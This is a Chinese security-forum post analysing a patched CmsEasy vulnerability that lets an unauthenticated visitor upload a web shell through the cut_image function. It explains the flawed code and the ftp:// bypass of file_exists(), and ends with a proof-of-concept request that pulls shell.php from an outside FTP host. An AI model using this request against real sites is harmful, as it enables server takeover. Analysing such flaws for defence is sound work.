黑帽联盟

 找回密码
 会员注册
查看: 1662|回复: 0
打印 上一主题 下一主题

[系统安全] CmsEasy前台无限制GetShell

[复制链接]

895

主题

38

听众

3323

积分

管理员

Rank: 9Rank: 9Rank: 9

  • TA的每日心情
    无聊
    5 天前
  • 签到天数: 1644 天

    [LV.Master]伴坛终老

    0.png

    简要描述

    CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话
    前台getshell漏洞修正;
    命令执行漏洞修正;
    我们就根据补丁来分析一下这个前台Getshell漏洞。

    漏洞详情
    修改的文件不多,通过diff发现补丁中lib/default/tool_act.php 392行的cut_image_action()函数被注释了。
    来看看这个函数
    1. /*function cut_image_action() {
    2.     $len = 1;
    3.     if(config::get('base_url') != '/'){
    4.         $len = strlen(config::get('base_url'))+1;
    5.     }
    6.     if(substr($_POST['pic'],0,4) == 'http'){
    7.         front::$post['thumb'] = str_ireplace(config::get('site_url'),'',$_POST['pic']);
    8.     }else{
    9.         front::$post['thumb'] = substr($_POST['pic'],$len);
    10.     }
    11.     $thumb=new thumb();
    12.     $thumb->set(front::$post['thumb'],'jpg');
    13.     $img=$thumb->create_image($thumb->im,$_POST['w'],$_POST['h'],0,0,$_POST['x1'],$_POST['y1'],$_POST['x2'] -$_POST['x1'],$_POST['y2'$new_name=$new_name_gbk=str_replace('.','',Time::getMicrotime()).'.'.end(explode('.',$_POST['pic']));
    14.     $save_file='upload/images/'.date('Ym').'/'.$new_name;
    15.     @mkdir(dirname(ROOT.'/'.$save_file));
    16.     ob_start();
    17.     $thumb->out_image($img,null,85);
    18.     file_put_contents(ROOT.'/'.$save_file,ob_get_contents());
    19.     ob_end_clean();
    20.     $image_url=config::get('base_url').'/'.$save_file;
    21.     //$res['size']=ceil(strlen($img) / 1024);
    22.     $res['code']="
    23.                     //$('#cut_preview').attr('src','$image_url');
    24.                     $('#thumb').val('$image_url');
    25.                     alert(lang('save_success'));
    26.     ";
    27.     echo json::encode($res);
    28. }
    29. */
    复制代码
    看保存文件名的生成
    1. $new_name=$new_name_gbk=str_replace('.','',Time::getMicrotime()).'.'.end(explode('.',$_POST['pic']));
    复制代码
    不过这里利用需要一点技巧 直接用了$_POST['pic']的后缀做为新文件的扩展名,应该就是这里导致的getshell。
    1、图片会经过php的图像库处理,如何在处理后仍然保留shell语句
    2、远程加载图片需要通过file_exists函数的验证(要知道http(s)对于file_exists来说会固定返回false)
    在正常图片中插入shell并无视图像库的处理 这个freebuf有介绍 国外也有不少分析,当然直接拿freebuf的方法应该是不成功的 需要一点小小的调整
    关于file_exits()函数 ftp://协议就可以绕过 wrappers中有介绍
    1.png
    $len = 1;
    这里构造payload还有一点需要注意的5.0.0以上 就支持file_exists()了
    1. if(config::get('base_url') != '/'){
    2.     $len = strlen(config::get('base_url'))+1;
    3. }
    4. if(substr($_POST['pic'],0,4) == 'http'){
    5.     front::$post['thumb'] =
    6.     str_ireplace(config::get('site_url'),'',$_POST['pic']);
    7. }else{
    8.     front::$post['thumb'] = substr($_POST['pic'],$len);
    9. }
    复制代码
    所以构造的时候 如果站点不是放在根目录 则需要在前面补位strlen(base_url)+2 如果放在根目录 也需要补上1位('/'的长度)。如果$_POST['pic']开头4个字符不是http的话,就认为是本站的文件,会从前面抽取掉baseurl(等于返回文件相对路径)。
    POC
    1. POST /index.php?case=tool&act=cut_image
    2. pic=111111111ftp://ludas.pw/shell.php&w=228&h=146&x1=0&x2=228&y1=0&y2=146
    复制代码
    本地测试截图
    2.png


    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    勿忘初心,方得始终!
    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部